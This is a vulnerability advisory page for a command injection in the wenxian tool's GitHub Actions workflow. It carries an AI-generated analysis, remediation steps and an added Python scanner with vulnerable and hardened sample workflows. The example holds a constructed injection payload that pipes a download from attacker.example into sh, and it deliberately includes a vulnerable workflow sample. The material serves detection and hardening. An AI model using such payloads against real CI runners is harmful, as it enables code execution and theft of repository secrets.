Description
wenxian is a tool to generate BIBTEX files from given identifiers (DOI, PMID, arXiv ID, or paper title). In versions 0.3.1 and prior, a GitHub Actions workflow uses untrusted user input from issue_comment.body directly inside a shell command, allowing potential command injection and arbitrary code execution on the runner. At time of publication, there are no publicly available patches.
Published: 2026-03-31
Score: 9.8 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Remote code execution on GitHub Actions runners
Action: Disable workflow
AI Analysis

Impact

Untrusted content from issue_comment.body is interpolated directly into a shell command in the GitHub Actions workflow of wenxian. Because the runner substitutes workflow expressions into the step script before the shell starts, an attacker who controls the comment body can break out of any surrounding quoting and run arbitrary shell commands on the workflow runner, which amounts to remote code execution. Workflows triggered by issue_comment run in the context of the repository's default branch, so the injected commands execute with the job's GITHUB_TOKEN and any repository secrets exposed to that job. This vulnerability aligns with CWE‑77 (command injection) and CWE‑78 (OS command injection).

Affected Systems

The affected product is wenxian, a BibTeX generation tool developed by njzjz. Version 0.3.1 and all earlier releases contain the flaw. The flaw lives in the project's GitHub Actions workflow rather than in the BibTeX-generation code itself; the exposure is to the repository hosted on GitHub, to the Actions runners that execute its workflow, and to anything those jobs can reach.

Risk and Exploitability

The CVSS v3.1 score is 9.8 (Critical), with vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H: reachable over the network, low attack complexity, no privileges or user interaction required, and total loss of confidentiality, integrity and availability. The EPSS score is below 1%, so the modelled probability of exploitation in the wild is low, yet the workflow is public and the only requirement is posting an issue comment, so anyone able to comment on the repository's issues can trigger it; the SSVC assessment recorded on this page rates exploitation as "poc" (a public proof of concept exists) and the attack as automatable. The vulnerability is not listed in CISA's KEV catalog. The attack vector is any account able to post or edit an issue comment that the workflow then processes without validation.

Generated by OpenCVE AI on April 3, 2026 at 17:51 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Disable the affected wenxian workflow, and any workflow of your own that passes issue_comment.body or other attacker-controlled event fields into a shell step, until a fix is available
  • Never interpolate `${{ github.event.comment.body }}` or similar expressions directly into a `run:` script; bind the value to an environment variable under `env:` and read it from the shell as a quoted variable, validating it against an allowlist where a specific identifier format (DOI, PMID, arXiv ID) is expected
  • Review Actions run logs for issue-comment-triggered jobs whose triggering comment contains shell metacharacters, and block or delete malicious comments
  • Check the project's repository for a release newer than 0.3.1 that fixes the workflow and upgrade when it is available
  • If no patch is forthcoming, consider replacing wenxian with an alternative tool, or with a workflow of your own that does not expose a command injection vector

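The mechanism described under Impact and the second recommended action above, as an added example that is not the wenxian project's own workflow or code: a small Python scanner that flags `${{ github.event.* }}` expressions interpolated into `run:` steps, run over two constructed workflows, one in the vulnerable shape the advisory describes and one hardened by passing the comment body through an environment variable, plus a function that mimics the runner's textual expression substitution to show why shell quoting around the expression does not help. Everything in the samples is constructed for illustration, including the `wenxian from` invocation and the attacker.example payload; the list of untrusted fields follows GitHub's security hardening guidance and is not exhaustive. Note that the payload field the description calls issue_comment.body is reached in a workflow as `github.event.comment.body`.

```python
"""Flag untrusted GitHub event fields interpolated into `run:` steps, and show
how such an expression lands in the shell script (added example, not project code)."""
import re

# Constructed sample in the shape the advisory describes: an issue_comment
# workflow whose shell step interpolates the comment body. The `wenxian from`
# invocation is illustrative, not copied from the project's workflow.
VULNERABLE_WORKFLOW = """\
name: bibtex-on-comment
on:
  issue_comment:
    types: [created]
jobs:
  bib:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Generate BibTeX from the comment
        run: |
          ID="${{ github.event.comment.body }}"
          wenxian from "$ID" > refs.bib
"""

# Same step hardened: the expression is bound to an environment variable, so
# the shell receives the body as data, never as script text.
HARDENED_WORKFLOW = """\
name: bibtex-on-comment
on:
  issue_comment:
    types: [created]
jobs:
  bib:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Generate BibTeX from the comment
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
        run: |
          ID="$(printf '%s\\n' "$COMMENT_BODY" | head -n 1)"
          wenxian from "$ID" > refs.bib
"""

# Event fields an attacker controls, drawn from GitHub's security hardening
# guidance (non-exhaustive; extend for your own triggers).
UNTRUSTED = re.compile(
    r"\bgithub\.(?:head_ref\b|event\.(?:"
    r"issue\.(?:title|body)|comment\.body|review\.body|review_comment\.body|"
    r"pull_request\.(?:title|body|head\.(?:ref|label))|"
    r"head_commit\.message|commits\.\*\.message|"
    r"commits\.\*\.author\.(?:name|email)))"
)
EXPR = re.compile(r"\$\{\{(.*?)\}\}", re.S)
RUN_KEY = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")


def run_blocks(workflow_text):
    """Yield (line_no, script) for each run: step, line_no being the 1-indexed
    first line of the script. A minimal line-based reader for the usual
    workflow layout: it follows block scalars (| or >) by indentation and is
    not a full YAML parser."""
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        indent, value = len(m.group(1)), m.group(2).strip()
        if value.rstrip("+-") in ("|", ">"):
            j = i + 1
            while j < len(lines) and (
                not lines[j].strip()
                or len(lines[j]) - len(lines[j].lstrip()) > indent
            ):
                j += 1
            yield i + 2, "\n".join(lines[i + 1 : j])
            i = j
        else:
            yield i + 1, value
            i += 1


def find_injections(workflow_text):
    """Return [(line_no, expression)] for every untrusted expression that is
    interpolated into a run: script."""
    hits = []
    for first_line, script in run_blocks(workflow_text):
        for m in EXPR.finditer(script):
            if UNTRUSTED.search(m.group(1)):
                line_no = first_line + script[: m.start()].count("\n")
                hits.append((line_no, m.group(0)))
    return hits


def expand_expressions(script, context):
    """Mimic the runner: `${{ expr }}` is replaced textually before the shell
    starts, so quotes placed around the expression cannot contain its value."""
    return EXPR.sub(lambda m: context.get(m.group(1).strip(), ""), script)


def first_run_script(workflow_text):
    return next(script for _, script in run_blocks(workflow_text))


# Constructed payload: closes the quoted assignment and appends a command.
MALICIOUS_BODY = 'x"; curl -s https://attacker.example/p | sh; echo "'

if __name__ == "__main__":
    print("vulnerable:", find_injections(VULNERABLE_WORKFLOW))
    print("hardened:  ", find_injections(HARDENED_WORKFLOW))
    ctx = {"github.event.comment.body": MALICIOUS_BODY}
    print(expand_expressions(first_run_script(VULNERABLE_WORKFLOW), ctx))
```

Run against the vulnerable sample the scanner reports the `run:` line that embeds `github.event.comment.body`, and the expanded script shows the assignment closed early with `curl ... | sh` following it as a separate command. The hardened sample produces no findings because its only expression sits under `env:`, where the runner places the value in the process environment and the shell sees `"$COMMENT_BODY"` as a single argument; the `head -n 1` is only a convenience for multi-line comments, and any format validation the tool needs (for example, that the value looks like a DOI) belongs on top of that.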
Advisories
Source: GitHub GHSA
ID: GHSA-r4fj-r33x-8v88
Title: wenxian: Command Injection in GitHub Actions Workflow via `issue_comment.body`
History

Fri, 03 Apr 2026 15:15:00 +0000

CPEs (added): cpe:2.3:a:njzjz:wenxian:*:*:*:*:*:python:*:*

Thu, 02 Apr 2026 20:30:00 +0000

Metrics (added): ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Wed, 01 Apr 2026 02:15:00 +0000

First Time appeared (added): Njzjz; Njzjz wenxian
Vendors & Products (added): Njzjz; Njzjz wenxian

Tue, 31 Mar 2026 16:15:00 +0000

Description (added): wenxian is a tool to generate BIBTEX files from given identifiers (DOI, PMID, arXiv ID, or paper title). In versions 0.3.1 and prior, a GitHub Actions workflow uses untrusted user input from issue_comment.body directly inside a shell command, allowing potential command injection and arbitrary code execution on the runner. At time of publication, there are no publicly available patches.
Title (added): wenxian: Command Injection in GitHub Actions Workflow via `issue_comment.body`
Weaknesses (added): CWE-77, CWE-78
References (added):
Metrics (added): cvssV3_1 {'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-02T15:21:36.168Z

Reserved: 2026-03-26T16:22:29.034Z

Link: CVE-2026-34243

Vulnrichment

Updated: 2026-04-02T15:21:32.144Z

NVD

Status : Analyzed

Published: 2026-03-31T16:16:33.253

Modified: 2026-04-03T14:38:17.593

Link: CVE-2026-34243

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-03T21:17:33Z

Weaknesses